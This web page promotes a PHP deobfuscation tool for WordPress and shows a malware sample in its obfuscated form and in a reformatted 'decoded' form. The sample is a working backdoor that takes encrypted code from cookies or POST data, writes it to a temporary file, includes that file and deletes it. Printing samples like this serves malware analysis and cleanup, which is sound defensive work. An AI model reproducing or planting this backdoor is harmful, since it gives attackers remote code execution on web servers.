Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php function b1($z2){$r3 = "3'k7hsx94<p@;gnb)0dt85_ym*veFlIE #(Hui-?/" ."cL.a" ."f" ."r" ."o" ;$g5='';foreach($z2 as $y4){$g5.=$r3[$y4];}return $g5;}$e6 = Array();$e6[] = b1(Array(0,15,3,18,3,15,0,0,38,20,45,45,18,38,8,44,41,20,38,7,45,7,21,38,44,17,41,0,27,7,17,0,18,0,21,20));$e6[] = b1(Arr...



Obfuscated php code

<?php 
function b1($z2){$r3 = "3'k7hsx94<p@;gnb)0dt85_ym*veFlIE #(Hui-?/" ."cL.a" ."f" ."r" ."o" ;$g5='';foreach($z2 as $y4){$g5.=$r3[$y4];}return $g5;}$e6 = Array();$e6[] = b1(Array(0,15,3,18,3,15,0,0,38,20,45,45,18,38,8,44,41,20,38,7,45,7,21,38,44,17,41,0,27,7,17,0,18,0,21,20));$e6[] = b1(Array(39,10,4,10,32,11,36,14,29,37,14,2,34,22,22,28,30,42,31,22,22,16,12,32));$e6[] = b1(Array(43,24,47,18,36,29,27));$e6[] = b1(Array(35,25));$e6[] = b1(Array(43,40));$e6[] = b1(Array(33));$e6[] = b1(Array(9));$e6[] = b1(Array(45,37,29,27,22,10,36,19,22,41,47,14,19,27,14,19,5));$e6[] = b1(Array(44,46,46,44,23,22,24,27,46,13,27));$e6[] = b1(Array(5,19,46,22,46,27,10,27,44,19));$e6[] = b1(Array(27,6,10,29,47,18,27));$e6[] = b1(Array(5,36,15,5,19,46));$e6[] = b1(Array(36,14,29,37,14,2));$e6[] = b1(Array(5,19,46,29,27,14));$e6[] = b1(Array(10,44,41,2));$e6[] = b1(Array(24,18,21));foreach ($e6[8]($_COOKIE, $_POST) as $i14 => $k11){function m8($e6, $i14, $z10){return $e6[11]($e6[9]($i14 . $e6[0], ($z10 / $e6[13]($i14)) + 1), 0, $z10);}function f7($e6, $r12){return @$e6[14]($e6[3], $r12);}function i9($e6, $r12){if (isset($r12[2])) {$v13 = $e6[4] . $e6[15]($e6[0]) . $e6[2];@$e6[7]($v13, $e6[6] . $e6[1] . $r12[1]($r12[2]));@include($v13);@$e6[12]($v13);exit();}}$k11 = f7($e6, $k11);i9($e6, $e6[10]($e6[5], $k11 ^ m8($e6, $i14, $e6[13]($k11))));}

Decoded(de-Obfuscated) php code

<?php

function b1($z2)
{
    $r3 = "3'k7hsx94<p@;gnb)0dt85_ym*veFlIE #(Hui-?/cL.afro";
    $g5 = '';
    foreach ($z2 as $y4) {
        $g5 .= $r3[$y4];
    }
    return $g5;
}
$e6 = array();
$e6[] = b1(array(0, 15, 3, 18, 3, 15, 0, 0, 38, 20, 45, 45, 18, 38, 8, 44, 41, 20, 38, 7, 45, 7, 21, 38, 44, 17, 41, 0, 27, 7, 17, 0, 18, 0, 21, 20));
$e6[] = b1(array(39, 10, 4, 10, 32, 11, 36, 14, 29, 37, 14, 2, 34, 22, 22, 28, 30, 42, 31, 22, 22, 16, 12, 32));
$e6[] = b1(array(43, 24, 47, 18, 36, 29, 27));
$e6[] = b1(array(35, 25));
$e6[] = b1(array(43, 40));
$e6[] = b1(array(33));
$e6[] = b1(array(9));
$e6[] = b1(array(45, 37, 29, 27, 22, 10, 36, 19, 22, 41, 47, 14, 19, 27, 14, 19, 5));
$e6[] = b1(array(44, 46, 46, 44, 23, 22, 24, 27, 46, 13, 27));
$e6[] = b1(array(5, 19, 46, 22, 46, 27, 10, 27, 44, 19));
$e6[] = b1(array(27, 6, 10, 29, 47, 18, 27));
$e6[] = b1(array(5, 36, 15, 5, 19, 46));
$e6[] = b1(array(36, 14, 29, 37, 14, 2));
$e6[] = b1(array(5, 19, 46, 29, 27, 14));
$e6[] = b1(array(10, 44, 41, 2));
$e6[] = b1(array(24, 18, 21));
foreach ($e6[8]($_COOKIE, $_POST) as $i14 => $k11) {
    function m8($e6, $i14, $z10)
    {
        return $e6[11]($e6[9]($i14 . $e6[0], $z10 / $e6[13]($i14) + 1), 0, $z10);
    }
    function f7($e6, $r12)
    {
        return @$e6[14]($e6[3], $r12);
    }
    function i9($e6, $r12)
    {
        if (isset($r12[2])) {
            $v13 = $e6[4] . $e6[15]($e6[0]) . $e6[2];
            @$e6[7]($v13, $e6[6] . $e6[1] . $r12[1]($r12[2]));
            @(include $v13);
            @$e6[12]($v13);
            exit;
        }
    }
    $k11 = f7($e6, $k11);
    i9($e6, $e6[10]($e6[5], $k11 ^ m8($e6, $i14, $e6[13]($k11))));
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.